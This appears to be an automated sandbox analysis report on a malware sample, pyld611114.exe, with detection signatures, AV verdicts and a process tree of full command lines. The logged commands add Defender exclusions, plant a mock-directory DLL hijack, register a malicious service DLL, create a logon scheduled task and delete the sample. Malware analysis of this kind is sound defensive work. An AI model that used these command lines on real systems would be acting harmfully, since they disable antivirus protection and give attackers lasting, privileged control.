
Windows Analysis Report
pyld611114.exe

Overview

General Information

Sample name:pyld611114.exe
Analysis ID:1577366
MD5:43bce45d873189f9ae2767d89a1c46e0
SHA1:34bc871a24e54a83740e0df51320b9836d8b820b
SHA256:9ae4784f0b139619ca8fdadfa31b53b1cbf7cd2b45f74b7e4004e5a97e842291
Tags:18521511316185215113209bulletproofexeuser-abus3reports

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • pyld611114.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\pyld611114.exe" MD5: 43BCE45D873189F9AE2767D89A1C46E0)
    • cmd.exe (PID: 7644 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7696 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3384 cmdline: cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • usvcinsta64.exe (PID: 4900 cmdline: "C:\Windows\System32\usvcinsta64.exe" MD5: 11DDC0A34BAC7AB099D2EE8D9817BF58)
        • cmd.exe (PID: 1976 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7432 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5704 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5728 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7824 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5292 cmdline: cmd.exe /c start "" "C:\Windows \System32\printui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • printui.exe (PID: 7644 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
            • cmd.exe (PID: 7780 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7928 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 7568 cmdline: cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 6408 cmdline: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 404 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • sc.exe (PID: 1976 cmdline: sc start x816796 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • cmd.exe (PID: 6908 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • console_zero.exe (PID: 5036 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 74CF33F8C2FCB56F749AAF411B9AE302)
                • cmd.exe (PID: 2084 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • schtasks.exe (PID: 6892 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • cmd.exe (PID: 3328 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • schtasks.exe (PID: 1484 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7696 cmdline: cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 2532 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 7652 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7924 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 2136 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6136 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 3164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3320 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 8152 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7188 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 8100 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2536 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5256 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2828 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4784 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 7560 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 8156 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 8096 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 6332 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 3700 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 7116 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 4144 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 936 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6032 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
  • console_zero.exe (PID: 4064 cmdline: C:\Windows\System32\console_zero.exe MD5: 74CF33F8C2FCB56F749AAF411B9AE302)
    • cmd.exe (PID: 8012 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8076 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4236 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2096 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: cmd.exe /c start "" "C:\Windows \System32\printui.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5292, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 7644, ProcessName: printui.exe
Source: File created, Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\System32\usvcinsta64.exe, ProcessId: 4900, TargetFilename: C:\Windows \System32\printui.dll
Source: Process started, Author: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 5036, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 3328, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\pyld611114.exe", ParentImage: C:\Users\user\Desktop\pyld611114.exe, ParentProcessId: 7528, ParentProcessName: pyld611114.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 7644, ProcessName: cmd.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 6408, ProcessName: sc.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 6408, ProcessName: sc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7644, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 7696, ProcessName: powershell.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3164, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: pyld611114.exe, Avira: detected
Source: C:\Windows \System32\printui.dll, Avira: detection malicious, Label: TR/Crypt.Agent.uguls
Source: C:\Windows\System32\x816796.dat, Avira: detection malicious, Label: TR/Agent.gjkfm
Source: C:\Windows\System32\usvcinsta64.exe, Avira: detection malicious, Label: TR/AD.Nekark.jksvb
Source: C:\Windows\System32\console_zero.exe, Avira: detection malicious, Label: TR/AVI.Agent.iscto
Source: C:\Windows \System32\printui.dll, ReversingLabs: Detection: 75%
Source: C:\Windows\System32\console_zero.exe, ReversingLabs: Detection: 70%
Source: C:\Windows\System32\usvcinsta64.exe, ReversingLabs: Detection: 83%
Source: C:\Windows\System32\x816796.dat, ReversingLabs: Detection: 70%
Source: pyld611114.exe, ReversingLabs: Detection: 76%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\System32\x816796.dat, Joe Sandbox ML: detected
Source: pyld611114.exe, Joe Sandbox ML: detected
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36142D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA36142D0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3612F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,42_2_00007FFDA3612F50
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36023C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36023C0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3624380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624380
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3620450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,42_2_00007FFDA3620450
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA368844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA368844C
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3688426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,42_2_00007FFDA3688426
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3688414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,42_2_00007FFDA3688414
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3638400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf,42_2_00007FFDA3638400
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36423F0 CRYPTO_free,42_2_00007FFDA36423F0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36062C0 CRYPTO_clear_free,42_2_00007FFDA36062C0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA362C2C0 CRYPTO_free,42_2_00007FFDA362C2C0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36802C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36802C0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA364A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,42_2_00007FFDA364A2C0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36102B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,42_2_00007FFDA36102B0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3624260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624260
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3670340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,42_2_00007FFDA3670340
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA363A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA363A330
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3634330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,42_2_00007FFDA3634330
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA361A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,42_2_00007FFDA361A330
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36622F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36622F0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36882E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36882E7
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA366A2E0 RAND_bytes_ex,CRYPTO_malloc,memset,42_2_00007FFDA366A2E0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA365A1D0 CRYPTO_realloc,42_2_00007FFDA365A1D0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA36541B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,42_2_00007FFDA36541B0
Source: C:\Windows\System32\svchost.exe, Code function: 42_2_00007FFDA3616190 CRYPTO_malloc,CRYPTO_free,42_2_00007FFDA3616190
